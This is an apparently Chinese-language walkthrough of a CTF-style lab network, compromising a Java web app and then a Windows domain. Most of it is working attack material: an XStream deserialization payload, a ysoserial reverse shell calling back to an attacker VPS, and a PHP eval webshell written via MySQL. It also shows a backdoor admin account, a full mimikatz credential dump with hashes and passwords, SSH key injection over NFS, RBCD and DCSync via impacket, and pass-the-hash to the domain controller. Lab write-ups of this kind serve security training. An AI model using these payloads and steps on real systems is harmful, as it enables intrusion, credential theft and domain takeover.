外网打点
fscan扫描
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
| ./fscan_mac -h 39.99.133.230
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
39.99.133.230:21 open
39.99.133.230:80 open
39.99.133.230:22 open
39.99.133.230:8080 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle http://39.99.133.230 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works
[*] WebTitle http://39.99.133.230:8080 code:200 len:3655 title:公司发货单
[+] ftp 39.99.133.230:21:anonymous
[->]1.txt
[->]pom.xml
已完成 4/4
[*] 扫描结束,耗时: 13.720528092s
|
扫到ftp匿名登录,ftp上有pom文件
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
| <?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<parent>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-parent</artifactId>
<version>2.7.2</version>
<relativePath/> <!-- lookup parent from repository -->
</parent>
<groupId>com.example</groupId>
<artifactId>ezjava</artifactId>
<version>0.0.1-SNAPSHOT</version>
<name>ezjava</name>
<description>ezjava</description>
<properties>
<java.version>1.8</java.version>
</properties>
<dependencies>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-thymeleaf</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-test</artifactId>
<scope>test</scope>
</dependency>
<dependency>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream</artifactId>
<version>1.4.16</version>
</dependency>
<dependency>
<groupId>commons-collections</groupId>
<artifactId>commons-collections</artifactId>
<version>3.2.1</version>
</dependency>
</dependencies>
<build>
<plugins>
<plugin>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-maven-plugin</artifactId>
</plugin>
</plugins>
</build>
</project>
|
定位到xstream,有cve
CVE-2021-29505
https://github.com/vulhub/vulhub/blob/master/xstream/CVE-2021-29505/README.zh-cn.md
vps用JRMPListener启动一个恶意的RMI Registry
1
| java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzUueHgueHgueHgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}"
|
接着监听一下弹shell的端口,然后向网站传poc,我这里用的9999
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
| POST /just_sumbit_it HTTP/1.1
Host: 39.99.133.230:8080
Content-Length: 105
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: application/xml;charset=UTF-8
Origin: http://39.99.133.230:8080
Referer: http://39.99.133.230:8080/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
<java.util.PriorityQueue serialization='custom'>
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
</default>
<int>3</int>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>12345</type>
<value class='com.sun.org.apache.xpath.internal.objects.XString'>
<m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>12345</type>
<value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
<message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
<parsedMessage>true</parsedMessage>
<soapVersion>SOAP_11</soapVersion>
<bodyParts/>
<sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
<attachmentsInitialized>false</attachmentsInitialized>
<nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
<aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
<candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
<names>
<string>aa</string>
<string>aa</string>
</names>
<ctx>
<environment/>
<registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
<java.rmi.server.RemoteObject>
<string>UnicastRef</string>
<string>VPS_IP</string>
<int>1099</int>
<long>0</long>
<int>0</int>
<long>0</long>
<short>0</short>
<boolean>false</boolean>
</java.rmi.server.RemoteObject>
</registry>
<host>VPS_IP</host>
<port>1099</port>
</ctx>
</candidates>
</aliases>
</nullIter>
</sm>
</message>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
</java.util.PriorityQueue>
</java.util.PriorityQueue>
|
找一下flag
1
| find / -type f -name '*flag*' 2>/dev/null
|
内网渗透
接着上代理和扫描
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
| ./fscan -h 172.22.13.0/24
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
(icmp) Target 172.22.13.14 is alive
(icmp) Target 172.22.13.6 is alive
(icmp) Target 172.22.13.28 is alive
(icmp) Target 172.22.13.57 is alive
[*] Icmp alive hosts len is: 4
172.22.13.14:22 open
172.22.13.14:21 open
172.22.13.28:3306 open
172.22.13.28:445 open
172.22.13.6:445 open
172.22.13.6:139 open
172.22.13.28:139 open
172.22.13.6:135 open
172.22.13.28:80 open
172.22.13.57:80 open
172.22.13.57:22 open
172.22.13.14:80 open
172.22.13.6:88 open
172.22.13.28:135 open
172.22.13.14:8080 open
172.22.13.28:8000 open
[*] alive ports len is: 16
start vulscan
[*] NetInfo
[*]172.22.13.6
[->]WIN-DC
[->]172.22.13.6
[*] WebTitle http://172.22.13.14 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works
[*] WebTitle http://172.22.13.28 code:200 len:2525 title:欢迎登录OA办公平台
[*] NetInfo
[*]172.22.13.28
[->]WIN-HAUWOLAO
[->]172.22.13.28
[*] NetBios 172.22.13.6 [+] DC:XIAORANG\WIN-DC
[*] WebTitle http://172.22.13.57 code:200 len:4833 title:Welcome to CentOS
[*] WebTitle http://172.22.13.14:8080 code:200 len:3655 title:公司发货单
[*] NetBios 172.22.13.28 WIN-HAUWOLAO.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] WebTitle http://172.22.13.28:8000 code:200 len:170 title:Nothing Here.
[+] ftp 172.22.13.14:21:anonymous
[->]1.txt
[->]pom.xml
[+] mysql 172.22.13.28:3306:root 123456
已完成 16/16
|
分析一下
1
2
3
4
| 172.22.13.6 dc
172.22.13.14 本机
172.22.13.57 nfs
172.22.13.28 mysql
|
这里有mysql弱口令,加个全局代理连上去
看一下secure_file_priv,发现可以写文件
再查看日志发现是phpstudy起的服务,那就很好,因为这东西权限很高,一般连上去就是system权限,不用udf提权了
写🐎
1
| select "<?php eval($_POST[1]);?>" into outfile "C:/phpstudy_pro/WWW/1.php";
|
再用蚁剑链接
然后建个用户rdp上去
1
2
| net user calmsec admin@123 /add
net localgroup administrators calmsec /add
|
猕猴桃抓一下hash
1
| mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords" "exit" > test.txt
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
|
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # log
Using 'mimikatz.log' for logfile : OK
mimikatz(commandline) # sekurlsa::logonpasswords
Authentication Id : 0 ; 8364475 (00000000:007fa1bb)
Session : RemoteInteractive from 2
User Name : calmsec
Domain : WIN-HAUWOLAO
Logon Server : WIN-HAUWOLAO
Logon Time : 2025/3/27 20:38:07
SID : S-1-5-21-2057596273-973658165-3030246172-1000
msv :
[00000003] Primary
* Username : calmsec
* Domain : WIN-HAUWOLAO
* NTLM : 579da618cfbfa85247acf1f800a280a4
* SHA1 : 39f572eceeaa2174e87750b52071582fc7f13118
tspkg :
wdigest :
* Username : calmsec
* Domain : WIN-HAUWOLAO
* Password : (null)
kerberos :
* Username : calmsec
* Domain : WIN-HAUWOLAO
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 8343078 (00000000:007f4e26)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/3/27 20:38:06
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* NTLM : 1def6d07e0fd2c570960edeca14d3722
* SHA1 : 7c0bd0d107fa4c9172dce78b8008a02bf293bb4d
tspkg :
wdigest :
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : WIN-HAUWOLAO$
* Domain : xiaorang.lab
* Password : b8 82 ef 5d 42 0a 24 cf 6c ac 10 fd af 50 2a 74 d5 21 11 2d 87 e8 9a 98 4a e6 26 84 78 71 92 d2 ac 69 21 40 5c 91 0e 8d 3f 4d ff cf f1 5a a7 90 9f fc 60 29 74 0f fb f9 cc e9 c4 d8 03 84 7a 29 dd e3 51 df a9 3f 5e c7 e8 3b 4e 62 82 11 de 82 a6 58 71 d0 6d 49 78 bb 83 7a b8 db 37 31 d6 5d 11 9e 26 41 1c 47 34 f9 d8 49 43 04 c0 87 6a 1d 8b b6 2f 85 0e 61 31 62 19 b7 bd 55 33 77 82 58 1a 42 4b da de d1 a7 34 63 ec 9e 55 01 94 cf a4 d2 d4 e7 a0 1f 73 f7 e2 5e 5b a4 2e 13 a4 70 ad a4 0e 34 b5 91 58 8e 24 61 92 a3 49 b6 6a 46 84 83 f9 be d3 06 14 e3 8a c6 a5 8c 22 9b 4c a5 5c 46 62 94 03 a9 e5 c2 e2 24 24 e4 27 a6 82 05 91 03 d3 2c b6 34 11 8f 37 27 9c 6a f2 34 b6 21 ae 25 c6 6c 6e 7f 81 a6 dc 07 9e 62 2c 18 37 a6 12
ssp :
credman :
Authentication Id : 0 ; 88154 (00000000:0001585a)
Session : Service from 0
User Name : chenglei
Domain : XIAORANG
Logon Server : WIN-DC
Logon Time : 2025/3/27 19:59:04
SID : S-1-5-21-3269458654-3569381900-10559451-1105
msv :
[00000003] Primary
* Username : chenglei
* Domain : XIAORANG
* NTLM : 0c00801c30594a1b8eaa889d237c5382
* SHA1 : e8848f8a454e08957ec9814b9709129b7101fad7
* DPAPI : 89b179dc738db098372c365602b7b0f4
tspkg :
wdigest :
* Username : chenglei
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : chenglei
* Domain : XIAORANG.LAB
* Password : Xt61f3LBhg1
ssp :
credman :
Authentication Id : 0 ; 53554 (00000000:0000d132)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/3/27 19:59:02
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* NTLM : 1def6d07e0fd2c570960edeca14d3722
* SHA1 : 7c0bd0d107fa4c9172dce78b8008a02bf293bb4d
tspkg :
wdigest :
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : WIN-HAUWOLAO$
* Domain : xiaorang.lab
* Password : b8 82 ef 5d 42 0a 24 cf 6c ac 10 fd af 50 2a 74 d5 21 11 2d 87 e8 9a 98 4a e6 26 84 78 71 92 d2 ac 69 21 40 5c 91 0e 8d 3f 4d ff cf f1 5a a7 90 9f fc 60 29 74 0f fb f9 cc e9 c4 d8 03 84 7a 29 dd e3 51 df a9 3f 5e c7 e8 3b 4e 62 82 11 de 82 a6 58 71 d0 6d 49 78 bb 83 7a b8 db 37 31 d6 5d 11 9e 26 41 1c 47 34 f9 d8 49 43 04 c0 87 6a 1d 8b b6 2f 85 0e 61 31 62 19 b7 bd 55 33 77 82 58 1a 42 4b da de d1 a7 34 63 ec 9e 55 01 94 cf a4 d2 d4 e7 a0 1f 73 f7 e2 5e 5b a4 2e 13 a4 70 ad a4 0e 34 b5 91 58 8e 24 61 92 a3 49 b6 6a 46 84 83 f9 be d3 06 14 e3 8a c6 a5 8c 22 9b 4c a5 5c 46 62 94 03 a9 e5 c2 e2 24 24 e4 27 a6 82 05 91 03 d3 2c b6 34 11 8f 37 27 9c 6a f2 34 b6 21 ae 25 c6 6c 6e 7f 81 a6 dc 07 9e 62 2c 18 37 a6 12
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : WIN-HAUWOLAO$
Domain : XIAORANG
Logon Server : (null)
Logon Time : 2025/3/27 19:59:02
SID : S-1-5-20
msv :
[00000003] Primary
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* NTLM : 1def6d07e0fd2c570960edeca14d3722
* SHA1 : 7c0bd0d107fa4c9172dce78b8008a02bf293bb4d
tspkg :
wdigest :
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : win-hauwolao$
* Domain : XIAORANG.LAB
* Password : b8 82 ef 5d 42 0a 24 cf 6c ac 10 fd af 50 2a 74 d5 21 11 2d 87 e8 9a 98 4a e6 26 84 78 71 92 d2 ac 69 21 40 5c 91 0e 8d 3f 4d ff cf f1 5a a7 90 9f fc 60 29 74 0f fb f9 cc e9 c4 d8 03 84 7a 29 dd e3 51 df a9 3f 5e c7 e8 3b 4e 62 82 11 de 82 a6 58 71 d0 6d 49 78 bb 83 7a b8 db 37 31 d6 5d 11 9e 26 41 1c 47 34 f9 d8 49 43 04 c0 87 6a 1d 8b b6 2f 85 0e 61 31 62 19 b7 bd 55 33 77 82 58 1a 42 4b da de d1 a7 34 63 ec 9e 55 01 94 cf a4 d2 d4 e7 a0 1f 73 f7 e2 5e 5b a4 2e 13 a4 70 ad a4 0e 34 b5 91 58 8e 24 61 92 a3 49 b6 6a 46 84 83 f9 be d3 06 14 e3 8a c6 a5 8c 22 9b 4c a5 5c 46 62 94 03 a9 e5 c2 e2 24 24 e4 27 a6 82 05 91 03 d3 2c b6 34 11 8f 37 27 9c 6a f2 34 b6 21 ae 25 c6 6c 6e 7f 81 a6 dc 07 9e 62 2c 18 37 a6 12
ssp :
credman :
Authentication Id : 0 ; 24165 (00000000:00005e65)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2025/3/27 19:59:01
SID :
msv :
[00000003] Primary
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* NTLM : 1def6d07e0fd2c570960edeca14d3722
* SHA1 : 7c0bd0d107fa4c9172dce78b8008a02bf293bb4d
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 8364504 (00000000:007fa1d8)
Session : RemoteInteractive from 2
User Name : calmsec
Domain : WIN-HAUWOLAO
Logon Server : WIN-HAUWOLAO
Logon Time : 2025/3/27 20:38:07
SID : S-1-5-21-2057596273-973658165-3030246172-1000
msv :
[00000003] Primary
* Username : calmsec
* Domain : WIN-HAUWOLAO
* NTLM : 579da618cfbfa85247acf1f800a280a4
* SHA1 : 39f572eceeaa2174e87750b52071582fc7f13118
tspkg :
wdigest :
* Username : calmsec
* Domain : WIN-HAUWOLAO
* Password : (null)
kerberos :
* Username : calmsec
* Domain : WIN-HAUWOLAO
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 8342695 (00000000:007f4ca7)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/3/27 20:38:06
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* NTLM : 1def6d07e0fd2c570960edeca14d3722
* SHA1 : 7c0bd0d107fa4c9172dce78b8008a02bf293bb4d
tspkg :
wdigest :
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : WIN-HAUWOLAO$
* Domain : xiaorang.lab
* Password : b8 82 ef 5d 42 0a 24 cf 6c ac 10 fd af 50 2a 74 d5 21 11 2d 87 e8 9a 98 4a e6 26 84 78 71 92 d2 ac 69 21 40 5c 91 0e 8d 3f 4d ff cf f1 5a a7 90 9f fc 60 29 74 0f fb f9 cc e9 c4 d8 03 84 7a 29 dd e3 51 df a9 3f 5e c7 e8 3b 4e 62 82 11 de 82 a6 58 71 d0 6d 49 78 bb 83 7a b8 db 37 31 d6 5d 11 9e 26 41 1c 47 34 f9 d8 49 43 04 c0 87 6a 1d 8b b6 2f 85 0e 61 31 62 19 b7 bd 55 33 77 82 58 1a 42 4b da de d1 a7 34 63 ec 9e 55 01 94 cf a4 d2 d4 e7 a0 1f 73 f7 e2 5e 5b a4 2e 13 a4 70 ad a4 0e 34 b5 91 58 8e 24 61 92 a3 49 b6 6a 46 84 83 f9 be d3 06 14 e3 8a c6 a5 8c 22 9b 4c a5 5c 46 62 94 03 a9 e5 c2 e2 24 24 e4 27 a6 82 05 91 03 d3 2c b6 34 11 8f 37 27 9c 6a f2 34 b6 21 ae 25 c6 6c 6e 7f 81 a6 dc 07 9e 62 2c 18 37 a6 12
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2025/3/27 19:59:02
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 53585 (00000000:0000d151)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/3/27 19:59:02
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* NTLM : b5cd3591a58e1169186bcdbfd4b6322d
* SHA1 : 226ee6b5e527e5903988f08993a2456e3297ee1f
tspkg :
wdigest :
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : WIN-HAUWOLAO$
* Domain : xiaorang.lab
* Password : `k+hcEDFvtzoObj=>DvzxiNqwyEn;Eu-\zFVAh>.G0u%BqQ21FskHtJlW4)3is3V;7Iu)3B00kd1##IB'LLG6wSx6TR%m;`Nfr;;Hf8O'Szfl0Z=w+^,>0jR
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : WIN-HAUWOLAO$
Domain : XIAORANG
Logon Server : (null)
Logon Time : 2025/3/27 19:59:01
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : WIN-HAUWOLAO$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : win-hauwolao$
* Domain : XIAORANG.LAB
* Password : b8 82 ef 5d 42 0a 24 cf 6c ac 10 fd af 50 2a 74 d5 21 11 2d 87 e8 9a 98 4a e6 26 84 78 71 92 d2 ac 69 21 40 5c 91 0e 8d 3f 4d ff cf f1 5a a7 90 9f fc 60 29 74 0f fb f9 cc e9 c4 d8 03 84 7a 29 dd e3 51 df a9 3f 5e c7 e8 3b 4e 62 82 11 de 82 a6 58 71 d0 6d 49 78 bb 83 7a b8 db 37 31 d6 5d 11 9e 26 41 1c 47 34 f9 d8 49 43 04 c0 87 6a 1d 8b b6 2f 85 0e 61 31 62 19 b7 bd 55 33 77 82 58 1a 42 4b da de d1 a7 34 63 ec 9e 55 01 94 cf a4 d2 d4 e7 a0 1f 73 f7 e2 5e 5b a4 2e 13 a4 70 ad a4 0e 34 b5 91 58 8e 24 61 92 a3 49 b6 6a 46 84 83 f9 be d3 06 14 e3 8a c6 a5 8c 22 9b 4c a5 5c 46 62 94 03 a9 e5 c2 e2 24 24 e4 27 a6 82 05 91 03 d3 2c b6 34 11 8f 37 27 9c 6a f2 34 b6 21 ae 25 c6 6c 6e 7f 81 a6 dc 07 9e 62 2c 18 37 a6 12
ssp :
credman :
mimikatz(commandline) # exit
Bye!
|
NFS挂载
题目说了nfs
14那台机器先更新一下依赖
1
2
3
| sudo sed -i 's/archive.ubuntu.com/mirrors.aliyun.com/g' /etc/apt/sources.list
sudo apt-get update
apt-get install nfs-common -y
|
再挂载nfs
1
2
3
| cd /
mkdir temp
mount -t nfs 172.22.13.57:/ ./temp -o nolock
|
发现只有
写公钥连上去
1
2
3
4
5
| ssh-keygen
cd /temp/home/joyce/
mkdir .ssh
cat /root/.ssh/id_rsa.pub >> /temp/home/joyce/.ssh/authorized_keys
ssh -i /root/.ssh/id_rsa joyce@172.22.13.57
|
发现没有权限
找找提权,提权探针
1
| find / -user root -perm -4000 -exec ls -ldb {} \;
|
ftp提权
我们能把flag传到ftp里,最初我们获得的机器里那个ftp服务没权限传,我们再起个
1
| nohup python3 -m pyftpdlib -p 6666 -u test -P test -w &
|
再ssh上57
1
2
| ftp 172.22.13.14 6666
put /flag02.txt
|
用户名test密码test
再回去看一下,有个pas.txt
1
| xiaorang.lab/zhangwen\QT62f3gBhK1
|
再回去用bloodhound收集一下域内信息
用BloodHound发现chenglei这个用户是ACL Admins组的,对WIN-DC具有WriteDacl权限,能写属性,比如写个DCSync、RBCD啥的
1
2
3
4
5
6
7
| proxychains python3 addcomputer.py xiaorang.lab/chenglei:'Xt61f3LBhg1' -dc-ip 172.22.13.6 -dc-host xiaorang.lab -computer-name 'TEST$' -computer-pass 'P@ssw0rd'
proxychains python3 rbcd.py xiaorang.lab/chenglei:'Xt61f3LBhg1' -dc-ip 172.22.13.6 -action write -delegate-to 'WIN-DC$' -delegate-from 'TEST$'
proxychains python3 getST.py xiaorang.lab/'TEST$':'P@ssw0rd' -spn cifs/WIN-DC.xiaorang.lab -impersonate Administrator -dc-ip 172.22.13.6
export KRB5CCNAME=Administrator@cifs_WIN-DC.xiaorang.lab@XIAORANG.LAB.ccache
|
然后改/etc/hosts把dc加进去,即可无密码连上去
1
| proxychains python3 psexec.py Administrator@WIN-DC.xiaorang.lab -k -no-pass -dc-ip 172.22.13.6
|
1
| type C:\User\Administrator\flag\flag04.txt
|
这种方法比较浪费时间,还有一种是直接加dcsync然后导出域控hash
https://github.com/EmpireProject/Empire/releases/tag/2.5
在这个目录下
1
2
3
4
| powershell
Import-Module .\powerview.ps1
Add-DomainObjectAcl -TargetIdentity 'DC=xiaorang,DC=lab' -PrincipalIdentity chenglei -Rights DCSync -Verbose
|
1
2
| proxychains4 python3 secretsdump.py xiaorang.lab/chenglei@172.22.13.6 -hashes :0c00801c30594a1b8eaa889d237c5382 -just-dc-ntlm
|
再用猕猴桃
1
| lsadump::dcsync /domain:xiaorang.lab /all /csv
|
最后打pth
1
| proxychains4 python3 wmiexec.py -hashes :6341235defdaed66fb7b682665752c9a Administrator@172.22.13.6
|